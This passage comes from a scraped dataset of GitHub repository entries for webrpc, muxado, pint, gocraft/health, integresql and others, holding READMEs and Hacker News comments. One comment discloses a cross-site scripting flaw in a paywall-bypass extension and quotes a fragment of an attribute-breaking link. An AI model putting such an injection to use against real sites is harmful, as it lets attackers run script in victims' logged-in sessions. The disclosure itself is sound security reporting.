[golang-basics](./_examples/golang-basics) | Go server <=> Go client |\n| [golang-nodejs](./_examples/golang-nodejs) | Go server <=> Node.js (Javascript ES6) client |\n| [node-ts](./_examples/node-ts) | Node.js server <=> Typescript webapp client |\n\n# Why\n\n**TLDR;** it's much simpler + faster to write and consume a webrpc service than traditional approaches\nlike a REST API or gRPC service.\n\n 1. Code-generate your client libraries in full -- never write another API client again\n 2. Compatible with the Web. A Webrpc server is just a HTTP/HTTPS server that speaks JSON, and thus\n all existing browsers, http clients, load balancers, proxies, caches, and tools work\n out of the box (versus gRPC). cURL \"just works\".\n 3. Be more productive, write more correct systems.\n\n---\n\nWriting a Web service / microservice takes a lot of work and time. REST is making me tired.\nThere are many pieces to build -- designing the routes of your service, agreeing on conventions\nfor the routes with your team, the request payloads, the response payloads, writing the actual server\nlogic, routing the methods and requests to the server handlers, implementing the handlers, and\nthen writing a client library for your desired language so it can speak to your Web\nservice. Yikes, it's a lot of work. Want to add an additional field or handler? yea, you\nhave to go through the entire cycle. And what about type-safety across the wire?\n\nwebrpc automates a lot the work for you. Now from a single [webrpc schema file](./schema/README.md),\nyou can use the `webrpc-gen` cli to generate source code for:\n* Strongly-typed request / response data payloads for your target language\n* Strongly-typed server interface and methods on the service, aka the RPC methods\n* Complete client library to communicate with the web service\n\n\n# Design / architecture\n\nwebrpc services speak JSON, as our goals are to build services that communicate with webapps.\nWe optimize for developer experience, ease of use and productivity when building backends\nfor modern webapps. However, webrpc also works great for service<->service communication,\nbut it won't be as fast as gRPC in that scenario, but I'd be surprised to hear if for the majority\nof cases that this would be a bottleneck or costly tradeoff.\n\nwebrpc is heavily inspired by gRPC and Twirp. It is architecturally the same and has a similar\nworkflow, but simpler. In fact, the webrpc schema is similar in design to protobuf, as\nin we have messages (structs) and RPC methods, but the type system is arguably more flexible and\ncode-gen tooling is simpler. The [webrpc schema](./schema/README.md) is a documentation-like\nlanguage for describing a server's api interface and the type system within is inspired by Go,\nTypescript and WASM.\n\nWe've been thinking about webrpc's design for years, and were happy to see gRPC and Twirp\ncome onto the scene and pave the way with some great patterns. Over the years and after writing\ndozens of backends for Javascript-based Webapps and native mobile apps, and even built prior\nlibraries like [chi](https://github.com/go-chi/chi), a HTTP router for Go -- we asked ourselves: \n\nWhy have \"Rails\" and \"Django\" been such productive frameworks for writing webapps? And the answer\nwe came to is that its productive because the server and client are the same program,\nrunning in the same process on the same computer. Rails/Django/others like it, when rendering\nclient-state can just call a function in the same program, the client and the server\nare within the same domain and same state -- everything is a function-call away. Compare this to\nmodern app development such as writing a React.js SPA or a native iOS mobile app, where the app\nspeaks to an external API server with now the huge added effort to bridge data/runtime from\none namespace (the app) to an entirely other namespace (the server). It's too much work and\ntakes too much time, and is too brittle. There is a better way! instead of writing the code..\njust generate it. If we generate all of the code to native objects in both app/server,\nsuddenly, we can make a remote service once again feel like calling a method on the same\nprogram running on the same computer/process. Remote-Procedure-Call works!\n\nFinally, we'd like to compare generated RPC services (gRPC/Twirp/webrpc/other) to the most\ncommon pattern to writing services by \"making a RESTful API\", where the machinery is similar\nto RPC services. Picture the flow of data when a client calls out to a server -- from a client\nruntime proxy-object, we encode that object, send it over the wire, the server decodes it into\na server runtime proxy-object, the server handler queries the db, returns a proxy object,\nencodes it, and sends the function return data over the wire again. That is a ton of work,\nespecially if you have to write it by hand and then maintain robust code in both the client and\nthe server. Ahh, I just want to call a function on my server from my app! Save yourself the work\nand time, and code-generate it instead - Enter gRPC / Twirp .. and now, webrpc :) \n\n\nFuture goals/work:\n1. Add RPC streaming support for client/server\n2. More code generators.. for Rust, Python, ..\n\n# Schema\n\nThe webrpc schema type system is inspired by Go and TypeScript, and is simple and flexible enough\nto cover the wide variety of language targets, designed to target RPC communication with Web\napplications and other Web services.\n\nHigh-level features:\n\n * RIDL, aka RPC IDL, aka \"RPC interface design language\", format - a documentation-like schema\n format for describing a server application.\n * JSON schema format is also supported if you prefer to write tools to target webrpc's code-gen tools\n * Type system inspired by Go + Typescript\n * integers, floats, byte, bool, any, null, date/time\n * lists (multi-dimensional arrays supported too)\n * maps (with nesting / complex structures)\n * structs / objects\n * optional fields, default values, and pluggable code-generation for a language target\n * enums\n\nFor more information please see the [schema readme](./schema/README.md).\n\n\n# Development\n\n## Building from source\n\n1. Install Go 1.16+\n2. $ `go get -u github.com/webrpc/webrpc/...`\n3. $ `make build`\n4. $ `make test`\n5. $ `go install ./cmd/webrpc-gen`\n\n\n## Writing your own code-generator\n\nSee [webrpc-gen documentation](./gen).\n\n\n# Authors\n\n* [Peter Kieltyka](https://github.com/pkieltyka)\n* [Jos\u00e9 Carlos Nieto](https://github.com/xiam)\n* [Vojtech Vitek](https://github.com/VojtechVitek)\n* ..and full list of [contributors](https://github.com/webrpc/webrpc/graphs/contributors)!\n\n\n# Credits\n\n* [Twirp authors](https://github.com/twitchtv/twirp) for making twirp. Much of the webrpc-go\nlibrary comes from the twirp project.\n* [gRPC authors](https://grpc.io), for coming up with the overall architecture and patterns\nfor code-generating the bindings between client and server from a common IDL.\n\n\n# License\n\nMIT\n", "readme_type": "markdown", "hn_comments": "A WebRTC pre-compiled library for Android reflects the recent WebRTC updates to facilitate real-time video chat using functional UI components, Kotlin extensions for Android, and Compose.In this article, you'll learn concepts of WebRTC and how to build an Android video application by breaking down WebRTC in Jetpack Compose.Doesn't build or run for me on any of the computers i try it. Is there a way to have a Docker container for that? Also, if i do the http(s) offload with nginx to redirect on it's 8080 port, will the rest work with appropriate ports open?\nYou can contact me on Telegram @codeda, i am willing to pay for the Dockerfile for it.I use Efficientdet and Websockets. On the LAN, WS can give subsecond latency quite easily.Unfortunately I don't have a learning accelerator or dedicated NVR machine, so I'm just using tricks like only decoding keyframes and running inference on those, but only if I've detected motion.I'd really like to do more with image recognition, edge computing surveillance has a lot of of potential to help people who don't trust the cloud solutions.Neat. But that 93% confidence in the \"bus\" is one of the things that bugs me about AI / NN.Very very nicely done. Elegant solution.The webrtc-rs team has been doing an amazing job.I have been experimenting with using it on mobile. We have a audio+video build that is only 1.7Mb, totally not possible with other stacks.Much needed thank you for doing gods work.", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "inconshreveable/muxado", "link": "https://github.com/inconshreveable/muxado", "tags": [], "stars": 515, "description": "Stream multiplexing for Go", "lang": "Go", "repo_lang": "", "readme": "# muxado - Stream multiplexing for Go [![godoc reference](https://godoc.org/github.com/inconshreveable/muxado?status.png)](https://godoc.org/github.com/inconshreveable/muxado)\n\nmuxado implements a general purpose stream-multiplexing protocol. muxado allows clients applications\nto multiplex any io.ReadWriteCloser (like a net.Conn) into multiple, independent full-duplex byte streams.\n\nmuxado is a useful protocol for any two communicating processes. It is an excellent base protocol\nfor implementing lightweight RPC. It eliminates the need for custom async/pipeling code from your peers\nin order to support multiple simultaneous inflight requests between peers. For the same reason, it also\neliminates the need to build connection pools for your clients. It enables servers to initiate streams\nto clients without building any NAT traversal. muxado can also yield performance improvements (especially\nlatency) for protocols that require rapidly opening many concurrent connections.\n\nmuxado's API is designed to make it seamless to integrate into existing Go programs. muxado.Session\nimplements the net.Listener interface and muxado.Stream implements net.Conn.\n\n## Example\n\nHere's an example client which responds to simple JSON requests from a server.\n\n```go\n conn, _ := net.Dial(\"tcp\", \"example.net:1234\")\n sess := muxado.Client(conn)\n for {\n stream, _ := sess.Accept()\n go func(str net.Conn) {\n defer str.Close()\n var req Request\n json.NewDecoder(str).Decode(&req)\n response := handleRequest(&req)\n json.NewEncoder(str).Encode(response)\n }(stream)\n }\n```\n\nMaybe the client wants to make a request to the server instead of just responding. This is easy as well:\n\n```go\n stream, _ := sess.Open()\n req := Request{\n Query: \"What is the meaning of life, the universe and everything?\",\n }\n json.NewEncoder(stream).Encode(&req)\n var resp Response\n json.dec.Decode(&resp)\n if resp.Answer != \"42\" {\n panic(\"wrong answer to the ultimate question!\")\n }\n```\n\n## Terminology\nmuxado defines the following terms for clarity of the documentation:\n\nA \"Transport\" is an underlying stream (typically TCP) that is multiplexed by sending frames between muxado peers over this transport.\n\nA \"Stream\" is any of the full-duplex byte-streams multiplexed over the transport\n\nA \"Session\" is two peers running the muxado protocol over a single transport\n\n## Implementation Design\nmuxado's design is influenced heavily by the framing layer of HTTP2 and SPDY. However, instead\nof being specialized for a higher-level protocol, muxado is designed in a protocol agnostic way\nwith simplicity and speed in mind. More advanced features are left to higher-level libraries and protocols.\n\n## Extended functionality\nmuxado ships with two wrappers that add commonly used functionality. The first is a TypedStreamSession\nwhich allows a client application to open streams with a type identifier so that the remote peer\ncan identify the protocol that will be communicated on that stream.\n\nThe second wrapper is a simple Heartbeat which issues a callback to the application informing it\nof round-trip latency and heartbeat failure.\n\n## Performance\nXXX: add perf numbers and comparisons\n\nAny stream-multiplexing library over TCP will suffer from head-of-line blocking if the next packet to service gets dropped.\nmuxado is also a poor choice when sending many large payloads concurrently.\nIt shines best when the application workload needs to quickly open a large number of small-payload streams.\n\n## Status\nMost of muxado's features are implemented (and tested!), but there are many that are still rough or could be improved. See the TODO file for suggestions on what needs to improve.\n\n## License\nApache\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "cloudflare/pint", "link": "https://github.com/cloudflare/pint", "tags": ["prometheus", "metrics", "linter", "observability", "validator"], "stars": 515, "description": "Prometheus rule linter/validator", "lang": "Go", "repo_lang": "", "readme": "---\nnav_exclude: true\n---\n\n# pint\n\npint is a Prometheus rule linter.\n\nYou can find [online docs](https://cloudflare.github.io/pint/) on GitHub Pages.\n\nAlternatively you can read raw Markdown documentation [here](/docs/index.md):\n\nChangelog is kept at [docs/changelog.md](/docs/changelog.md).\n\nCheck [examples](/docs/examples) dir for sample config files.\n", "readme_type": "markdown", "hn_comments": "adrien from updown.io here.Sorry about this, I still don't have any answer or explanation from Vultr or CloudFlare at this point. Most likely cause IMO is that CloudFlare (accidentally?) blocked one or many big ranges of IPs belonging to Vultr (and maybe some other providers as people seems to say Vultr was not the only impacted). I noticed during the incident this morning for example that I could ping CloudFlare IPv6 (ICMP) but not connect through TCP (port 443). So this sounds more like a firewall than a routing issue from what I could see.I'll update once I have anything else in https://status.updown.io/issue/1e196616-1368-43a0-8c04-82cff.... For the moment I'm keeping the mitigation in place just in case.If you have more details about this from CloudFlare or elsewhere I'll be happy to hear it :)Issue seems to be resolved now: https://status.appbeat.io/same for me :/ since 1:41 CET\nhttps://status.ioverlander.com/Yeah, I just woke up to some alerts, too. Sometimes I get the feeling people don't take IPv6 seriously!oh, so that's why I have 200 emails in my inbox? I use the same combo: updown.io and cloudflare. can it be related to updown.io?I have a personal monitoring system (uptime kuma) running on Hetzner (Germany data center) and since around 5am UTC today I am seeing intermittent timeouts only on services proxied by cloudflare so not just Vultr affected it seems\u2026Startups can create alternatives to those services. Then get bought out by one of the big tech companies like Microsoft or Google. Don't be afraid to compete as long as yours is cheaper and better quality.The Microsoft Windows Empire upsets me because businesses depend on it and Windows 10/11 updates take too long and mess up device drivers and programs.That's cool and all, but I'm probably going to make something to hide it. I also hate paywalls, but (almost) all of them are so easy to circumvent that I usually do it in the inspector.Does anyone remember \"BugMeNot\" ?OK, I need to inquire about `passTheButter()`. A hat tip to \"GreasyFork\"? Or perhaps this is about \"sliding\" past the paywalls?Heads up this is vulnerable to cross site scripting [1]. If someone submits a link like: https://example.com\">\n\nThen simply viewing the hackernews index page with this extension installed will let the submitter execute whatever javascript they want in your logged in hackernews context - no user interaction necessary.[1]: https://github.com/MostlyEmre/hn-anti-paywall/blob/main/scri...This feels very ethically icky to me. Folks are working hard to write these articles, and need to get paid.If you don\u2019t like paywalled articles just don\u2019t read them, I don\u2019t think it\u2019s ethically sound to do this.Just my $0.02Needs to show a project license. Otherwise, pretty cool!Imo these types of thing while probably appreciated by many lead to cat-and-mouse games and probably ultimately to hard-paywalls being more widely adopted (I see them a lot already in fact). So what happens then? The utility of these paywall bypass options diminishes until there\u2019s little of value left behind soft-paywallsThere a \u201cmetadata section\u201d on HN submissions?should be the defaultCloudflare offers a lot of stuff, if you mean compete on DDOS protection, you best case is host-provider DDOA protection, which won't MITM connections.Gatekeeper ?https://github.com/AltraMayor/gatekeeper/wikiBen Thompson has analyzed in his blog how Cloudflare applied the Disruptive Innovation model - https://stratechery.com/2021/cloudflares-disruption/. The CTO of Cloudflare sort of acknowledged that on HN back then - https://news.ycombinator.com/item?id=28708371There must be new niches (\"value networks\" as per that blog) that Cloudflare finds not worthwhile to serve. Usually they're at the lower end or the \"nonconsumption\" case, as described in the above blog post. That's one way to chip away at a bit of their customer base.But it's best to just focus on customers and not imagine you're \"competing with Cloudflare\". Nothing to be gained by framing it that way.I don\u2019t understand why people are so up in arms about Cloudflare being a MITM, but not e.g. AWS API Gateway being a MITM.Best way to compete with Cloudflare is to use decentralized cloud storage options, that are compatible with S3, cheaper, and faster \u2013 like storj.ioFrom Netlify: Hey everyone, this was definitely an issue on our side. We were testing an internal change to our routing mechanism and returned a testing message for some of the requests. Unfortunately, in a subset of CDN locations, for customers on our regular network (not HP Edge) that have a proxy in front of Netlify, those test responses were routed through their proxy. That meant that these test responses were cached there and served instead of the corresponding asset.Not cool to post with a title slamming Cloudflare when you admit at the bottom of the post it may not be them. Until you are sure where the fault is, best not to start making accusations.We had the same issue today. Isolated several variables and confirmed it only happens when caching Netlify sites through Cloudflare. It replaced not only our CSS file, but all cached assets included our homepage, images, videos, .js files... Took down our entire site and the only way to fix was completely disabling caching through Cloudflare. Seems like to me that it is a Netlify issue that is responding incorrectly specifically to CF's servers, but it's also possible it's a Cloudflare issue. We literally just moved our entire site over to a backup server temporarily until we can get it figured out.https://answers.netlify.com/t/javascript-and-css-assets-spor...confirmed to be a netlify issue and should be resolvedOpen a ticket. Could be a bug on their end or an issue on yours.I'm having this same issue and have a ticket open with cloudflare enterprise support -- started this morning just after cloudflare performed maintenance on their DNS. No response from ENT support yet.Opening a ticket with netlify too. for now i've simply put a cloudflare page rule up to bypass cache.", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "tj/go-spin", "link": "https://github.com/tj/go-spin", "tags": [], "stars": 515, "description": "Terminal spinner package for Golang", "lang": "Go", "repo_lang": "", "readme": "", "readme_type": "text", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "gocraft/health", "link": "https://github.com/gocraft/health", "tags": [], "stars": 515, "description": "Instrument your web apps with logging and metrics", "lang": "Go", "repo_lang": "", "readme": "# gocraft/health [![GoDoc](https://godoc.org/github.com/gocraft/health?status.png)](https://godoc.org/github.com/gocraft/health)\n\ngocraft/health allows you to instrument your service for logging and metrics, and then send that instrumentation to log files, StatsD, Bugsnag, or to be polled and aggregated via a JSON API.\n\ngocraft/health also ships with a New Relic-like aggregator (called healthd) that shows you your slowest endpoints, top error producers, top throughput endpoints, and so on.\n\n## Instrumenting your service\n\n### Make a new stream with sinks\n\nFirst, you'll want to make a new Stream and attach your sinks to it. Streams are commonly saved in a global variable.\n\n```go\nimport (\n\t\"github.com/gocraft/health\"\n\t\"github.com/gocraft/health/sinks/bugsnag\"\n\t\"os\"\n)\n\n// Save the stream as a global variable\nvar stream = health.NewStream()\n\n// In your main func, initiailze the stream with your sinks.\nfunc main() {\n\t// Log to stdout! (can also use WriterSink to write to a log file, Syslog, etc)\n\tstream.AddSink(&health.WriterSink{os.Stdout})\n\n\t// Log to StatsD!\n\tstatsdSink, err = health.NewStatsDSink(\"127.0.0.1:8125\", \"myapp\")\n\tif err != nil {\n\t\tstream.EventErr(\"new_statsd_sink\", err)\n\t\treturn\n\t}\n\tstream.AddSink(statsdSink)\n\n\t// Expose instrumentation in this app on a JSON endpoint that healthd can poll!\n\tsink := health.NewJsonPollingSink(time.Minute, time.Minute*5)\n\tstream.AddSink(sink)\n\tsink.StartServer(addr)\n\n\t// Send errors to bugsnag!\n\tstream.AddSink(bugsnag.NewSink(&bugsnag.Config{APIKey: \"myApiKey\"}))\n\n\t// Now that your stream is setup, start a web server or something...\n}\n```\n\n### Jobs\n\ngocraft/health excels at instrumenting services that perform *jobs*. Examples of jobs: serving an HTTP request, serving an RPC request, or processing a message from a work queue. Jobs are encoded semantically into gocraft/health in order to provide out-of-the-box answers to questions like, \"what is my slowest endpoint?\"\n\nJobs serve three functions:\n* Jobs record a timing (eg, it took 21ms to complete this job)\n* Jobs record a status (eg, did the job complete successfully or was there an error?)\n* Jobs group instrumentation inside that job together so that you can analyze it later.\n\nLet's say you're writing a web service that processes JSON requests/responses. You might write something like this:\n\n```go\nimport (\n\t\"github.com/gocraft/health\"\n\t\"net/http\"\n)\nvar stream = health.NewStream()\nfunc main() {\n\t// setup stream with sinks\n\tstream.AddSink(&health.WriterSink{os.Stdout})\n\thttp.HandleFunc(\"/users\", getUsers)\n}\n\nfunc getUsers(rw http.ResponseWriter, r *http.Request) {\n\t// All logging and instrumentation should be within the context of a job!\n\tjob := stream.NewJob(\"get_users\")\n\n\terr := fetchUsersFromDatabase(r)\n\tif err != nil {\n\t\t// When in your job's context, you can log errors, events, timings, etc.\n\t\tjob.EventErr(\"fetch_user_from_database\", err)\n\t}\n\n\t// When done with the job, call job.Complete with a completion status.\n\tif err == nil {\n\t\tjob.Complete(health.Success)\n\t} else {\n\t\tjob.Complete(health.Error)\n\t}\n}\n\n```\n\n(This example is just used for illustration -- in practice, you'll probably want to use middleware to create your job if you have more than a few endpoints.)\n\nThere are five types of completion statuses:\n* **Success** - Your job completed successfully.\n* **Error** - Some library call resulted in an error that prevented you from successfully completing your job.\n* **Panic** - Some code paniced!\n* **ValidationError** - Your code was fine, but the user passed in bad inputs, and so the job wasn't completed successfully.\n* **Junk** - The job wasn't completed successfully, but not really because of an Error or ValidationError. For instance, maybe there's just a 404 (not found) or 401 (unauthorized) request to your app. This status code might not apply to all apps.\n\n### Events, Timings, Gauges, and Errors\n\nWithin jobs, you can emit events, timings, gauges, and errors. The first argument of each of these methods is supposed to be a *key*. Camel case with dots is good because it works with other metrics stores like StatsD. Each method has a basic version as well as a version that accepts keys/values.\n\n#### Events\n\n```go\n// Events. Notice the camel case with dots.\n// (This is helpful when you want to use StatsD sinks)\njob.Event(\"starting_server\")\njob.Event(\"proccess_user.by_email.gmail\")\n\n// Event with keys and values:\njob.EventKv(\"failover.started\", health.Kvs{\"from_ip\": fmt.Sprint(currentIP)})\n```\n\n* For the WriterSink, an event is just like logging to a file:\n```\n[2015-03-11T22:53:22.115855203Z]: job:/api/v2/user_stories event:starting_request kvs:[path:/api/v2/user_stories request-id:F8a8bQOWmRpO6ky]\n```\n\n* For the StatsD sink (and other metrics sinks), an event is like incrementing a counter.\n\n#### Timings\n\n```go\n// Timings:\nstartTime := time.Now()\n// Do something...\njob.Timing(\"fetch_user\", time.Since(startTime).Nanoseconds()) // NOTE: Nanoseconds!\n\n// Timings also support keys/values:\njob.TimingKv(\"fetch_user\", time.Since(startTime).Nanoseconds(),\n\thealth.Kvs{\"user_email\": userEmail})\n```\n\n* NOTE: All timing values are in nanoseconds.\n* For the WriterSink, a timing is just like logging to a file:\n```\n[2014-12-17T20:36:24.136663759Z]: job:/api/v2/user_stories event:dbr.select time:371 \u03bcs kvs:[request-id:F8a8bQOWmRpO6ky sql:SELECT COUNT(*) FROM user_stories WHERE (subdomain_id = 1221) AND (deleted_at IS NULL) AND (ticket_id IN (38327))]\n```\n\n* For the StatsD sink, we'll send it to StatsD as a timing.\n* The JSON polling sink will compute a summary of your timings: min, max, avg, stddev, count, sum.\n\n#### Gauges\n\n```go\n// Gauges:\njob.Gauge(\"num_goroutines\", numRunningGoroutines()) \n\n// Timings also support keys/values:\njob.GaugeKv(\"num_goroutines\", numRunningGoroutines(),\n\thealth.Kvs{\"dispatcher\": dispatcherStatus()})\n```\n\n* For the WriterSink, a timing is just like logging to a file:\n```\n[2014-12-17T20:36:24.136663759Z]: job:/api/v2/user_stories event:num_goroutines gauge:17 kvs:[request-id:F8a8bQOWmRpO6ky dispatcher:running]\n```\n\n* For the StatsD sink, we'll send it to StatsD as a gauge.\n\n#### Errors\n\n```go\n// Errors:\nerr := someFunc(user.Email)\nif err != nil {\n\treturn job.EventErr(\"some_func\", err)\n}\n\n// And with keys/Values:\njob.EventErrKv(\"some_func\", err, health.Kvs{\"email\": user.Email})\n```\n\n* For the WriterSink, and error will just log to the file with the error:\n```\njob:/api/v2/user_stories event:load_session.populate err:not_found kvs:[request-id:F8a8bQOWmRpO6ky]\n```\n\n* For metrics sinks, Errors are just like Events\n* The JSON polling sink and healthd will let you see which errors are trending.\n* For the Bugsnag sink, we'll push each error to bugsnag.\n\nErrors will capture a stacktrace by default so that you can diagnose it in things like Bugsnag. If an error is common or not worth sending to something like Bugsnag, you can mute it. This will cause health to not capture a stack trace or send it to bugsnag:\n\n```go\ni, err := strconv.ParseInt(userInput, 10, 0)\nif err != nil {\n\t// Mute this error! It's pretty common and\n\t// does not indicate a problem with our code!\n\tjob.EventErr(\"myfunc.parse_int\", health.Mute(err))\n\ti = 2 // We have a default anyway. No big deal.\n}\n```\n\nSince error handling is so prevalent in Go code, you'll have sitations where multiple functions have the option of loggin the same root error. The best practice that we've identified is to just not think about it and log it on every level of the call stack. Keep in mind that gocraft/health will handle this intelligently and only send one error to Bugsnag, have a correct root backtrace, and so on.\n\n```go\nfunc showUser(ctx *Context) error {\n\tuser, err := ctx.getUser()\n\tif err != nil {\n\t\t// But we'll just log it here too!\n\t\treturn ctx.EventErr(\"show_user.get_user\", err)\n\t}\n}\n\nfunc getUser(ctx *Context) (*User, error) {\n\tvar u User\n\terr := ctx.db.Select(\"SELECT * FROM users WHERE id = ?\", ctx.userID).LoadStruct(&u)\n\tif err != nil {\n\t\t// Original error is here:\n\t\treturn nil, ctx.EventErr(\"get_user.select\", err)\n\t}\n\treturn &u, nil\n}\n```\n\n### Keys and Values\n\nMost objects and methods in health work with key/value pairs. Key/value pairs are just maps of strings to strings. Keys and values are only relevant right now for logging sinks: The keys and values will be printed on each line written.\n\nYou can add keys/values to a stream. This is useful for things like hostname or pid. They keys/values will show up on every future event/timing/error.\n```go\nstream := health.NewStream()\nstream.KeyValue(\"hostname\", hostname)\nstream.KeyValue(\"pid\", pid)\n```\n\nYou can add keys/values to a job. This is useful for things like a request-id or the current user id:\n```go\njob.KeyValue(\"request_id\", makeRequestID())\nif user != nil {\n\tjob.KeyValue(\"user_id\", fmt.Sprint(user.ID))\n}\n```\n\nAnd as previously discussed, each individual event/timing/error can have its own keys and values.\n\n### Writing your own Sink\n\nIf you need a custom sink, you can just implement the Sink interface:\n\n```go\ntype Sink interface {\n\tEmitEvent(job string, event string, kvs map[string]string)\n\tEmitEventErr(job string, event string, err error, kvs map[string]string)\n\tEmitTiming(job string, event string, nanoseconds int64, kvs map[string]string)\n\tEmitGauge(job string, event string, value float64, kvs map[string]string)\n\tEmitComplete(job string, status CompletionStatus, nanoseconds int64, kvs map[string]string)\n}\n```\n\nIf you do implement a custom sink that you think would be valuable to other people, I'd be interested in including it in this package. Get in touch via an issue or send a pull requset.\n\n### Miscellaneous logging\n\nIf you need to, you can log via a stream directly without creating a job. This will emit events under a job named 'general'. This is useful during application initialization:\n\n```go\nstream := NewStream()\nstream.EventKv(\"starting_app\", health.Kvs{\"listen_ip\": listenIP})\n```\n\n## healthd and healthtop\n\nWe've built a set of tools to give you New Relic-like application performance monitoring for your Go app. It can show you things like your slowest endpoints, top error producers, top throughput endpoints, and so on.\n\nThese tools are completely optional -- health is super useful without them. But with them, it becomes even better.\n\n\n![Healthtop Screenshot](https://gocraft.github.io/health/images/healthtop.png)\n\n### Add a JsonPollingSink to your stream\n\n```go\n// Make sink and add it to stream:\nsink := health.NewJsonPollingSink(time.Minute, time.Minute*5)\nstream.AddSink(sink)\n\n// Start the HTTP server! This will expose metrics via a JSON API.\n// NOTE: this won't interfere with your main app (if it also serves HTTP),\n// since it starts a separate net/http server.\n// In prod, addr should be a private network interface and port, like \"10.2.1.4:5020\"\n// In local dev, it can be something like \"127.0.0.1:5020\"\nsink.StartServer(addr)\n```\n\nOnce you start your app, you can browse to ```/health``` endpoint (eg, ```127.0.0.1:5020/health```) to see your metrics. Per the initialization options above, your metrics are aggregated in 1-minute chunks. We'll keep 5 minutes worth of data in memory. Nothing is ever persisted to disk.\n\n\n### Start healthd\n\nhealthd will poll multiple services that are exposing a ```/health``` endpoint and aggregate that data. It will then expose that data via its own JSON API. You can query the healthd API to answer questions like 'what are my slowest endpoints'?\n\nInstall the healthd binary:\n\n```bash\ngo get github.com/gocraft/health/cmd/healthd\n```\n\nNow you can run it. It accepts two main inputs as environment variables:\n\n* **HEALTHD_MONITORED_HOSTPORTS**: comma separated list of hostports that represent your services running the JsonPollingSink. Example: ```HEALTHD_MONITORED_HOSTPORTS=10.18.23.130:5020,10.18.23.131:5020```\n* **HEALTHD_SERVER_HOSTPORT**: interface and port where you want to expose the healthd endpoints. Example: ```HEALTHD_SERVER_HOSTPORT=10.18.23.132:5032```\n\nPutting those together:\n```bash\nHEALTHD_MONITORED_HOSTPORTS=10.18.23.130:5020,10.18.23.131:5020 HEALTHD_SERVER_HOSTPORT=10.18.23.132:5030 healthd\n```\n\nOf course, in local development mode, you can do something like this:\n```bash\nHEALTHD_MONITORED_HOSTPORTS=:5020 HEALTHD_SERVER_HOSTPORT=:5032 healthd\n```\n\nGreat! To get a sense of the type of data healthd serves, you can manually navigate to:\n\n* ```/jobs```: Lists top jobs \n* ```/aggregations```: Provides a time series of aggregations\n* ```/aggregations/overall```: Squishes all time series aggregations into one aggregation.\n* ```/hosts```: Lists all monitored hosts and their statuses.\n\nHowever, viewing raw JSON is just to give you a sense of the data. See the next section...\n\n### Use healthtop to query healthd\n\nhealthtop is a command-line tool that repeatedly queries a healthd and displays the results.\n\nInstall the healthtop binary:\n\n```bash\ngo get github.com/gocraft/health/cmd/healthtop\n```\n\nSee your top jobs:\n\n```bash\nhealthtop jobs\n```\n\n![Healthtop Screenshot](https://gocraft.github.io/health/images/healthtop.png)\n\n(By default, healthop will query healthd on localhost:5032 -- if this is not the case, you can use the source option: ```healthtop --source=10.28.3.132:5032 jobs```)\n\nYou can sort your top jobs by a variety of things:\n\n```bash\n$ healthtop jobs --sort\nError: flag needs an argument: --sort\nUsage of jobs:\n -h, --help=false: help for jobs\n --name=\"\": name is a partial match on the name\n --sort=\"name\": sort \u2208 {name, count, count_success, count_XXX, min, max, avg}\n --source=\"localhost:5032\": source is the host:port of the healthd to query. ex: localhost:5031\n\n$ healthtop jobs --sort=count_error\n```\n\n\nSee your hosts:\n\n```bash\nhealthtop hosts\n```\n\n![Healthtop Screenshot](https://gocraft.github.io/health/images/healthtop_hosts.png)\n\nTo get help:\n\n```bash\nhealthtop help\n```\n\n## Current Status and Contributing\n\nCurrently, the core instrumentation component is very solid. Healthd is good. healthtop is functional but could use some love.\n\nRequest for contributions:\n\nhealth core:\n\n* A way to do fine-grained histograms with variable binning.\n\nhealthd & healthtop\n\n* A web UI that is built into healthd\n* Keep track of multiple service types so that we can use one healthd to monitor multiple types of applications\n* Ability to drill into specific jobs to see top errors\n* tests\n* general love\n\nIf anything here interests you, let me know by opening an issue and we can collaborate on it.\n\n## gocraft\n\ngocraft offers a toolkit for building web apps. Currently these packages are available:\n\n* [gocraft/web](https://github.com/gocraft/web) - Go Router + Middleware. Your Contexts.\n* [gocraft/dbr](https://github.com/gocraft/dbr) - Additions to Go's database/sql for super fast performance and convenience.\n* [gocraft/health](https://github.com/gocraft/health) - Instrument your web apps with logging and metrics.\n* [gocraft/work](https://github.com/gocraft/work) - Process background jobs in Go.\n\nThese packages were developed by the [engineering team](https://eng.uservoice.com) at [UserVoice](https://www.uservoice.com) and currently power much of its infrastructure and tech stack.\n\n## Authors\n\n* Jonathan Novak -- [https://github.com/cypriss](https://github.com/cypriss)\n* Sponsored by [UserVoice](https://eng.uservoice.com)\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "allaboutapps/integresql", "link": "https://github.com/allaboutapps/integresql", "tags": ["golang", "go", "postgres", "postgresql", "server", "integration-testing", "id-allaboutapps-backend"], "stars": 515, "description": "IntegreSQL manages isolated PostgreSQL databases for your integration tests.", "lang": "Go", "repo_lang": "", "readme": "# IntegreSQL\r\n\r\n`IntegreSQL` manages isolated PostgreSQL databases for your integration tests.\r\n\r\nDo your engineers a favour by allowing them to write fast executing, parallel and deterministic integration tests utilizing **real** PostgreSQL test databases. Resemble your live environment in tests as close as possible. \r\n\r\n[![](https://img.shields.io/docker/image-size/allaboutapps/integresql)](https://hub.docker.com/r/allaboutapps/integresql) [![](https://img.shields.io/docker/pulls/allaboutapps/integresql)](https://hub.docker.com/r/allaboutapps/integresql) [![Docker Cloud Build Status](https://img.shields.io/docker/cloud/build/allaboutapps/integresql)](https://hub.docker.com/r/allaboutapps/integresql) [![](https://goreportcard.com/badge/github.com/allaboutapps/integresql)](https://goreportcard.com/report/github.com/allaboutapps/integresql) ![](https://github.com/allaboutapps/integresql/workflows/build/badge.svg?branch=master)\r\n\r\n- [IntegreSQL](#integresql)\r\n - [Background](#background)\r\n - [Approach 0: Leaking database mutations for subsequent tests](#approach-0-leaking-database-mutations-for-subsequent-tests)\r\n - [Approach 1: Isolating by resetting](#approach-1-isolating-by-resetting)\r\n - [Approach 2a: Isolation by transactions](#approach-2a-isolation-by-transactions)\r\n - [Approach 2b: Isolation by mocking](#approach-2b-isolation-by-mocking)\r\n - [Approach 3a: Isolation by templates](#approach-3a-isolation-by-templates)\r\n - [Approach 3b: Isolation by cached templates](#approach-3b-isolation-by-cached-templates)\r\n - [Approach 3c: Isolation by cached templates and 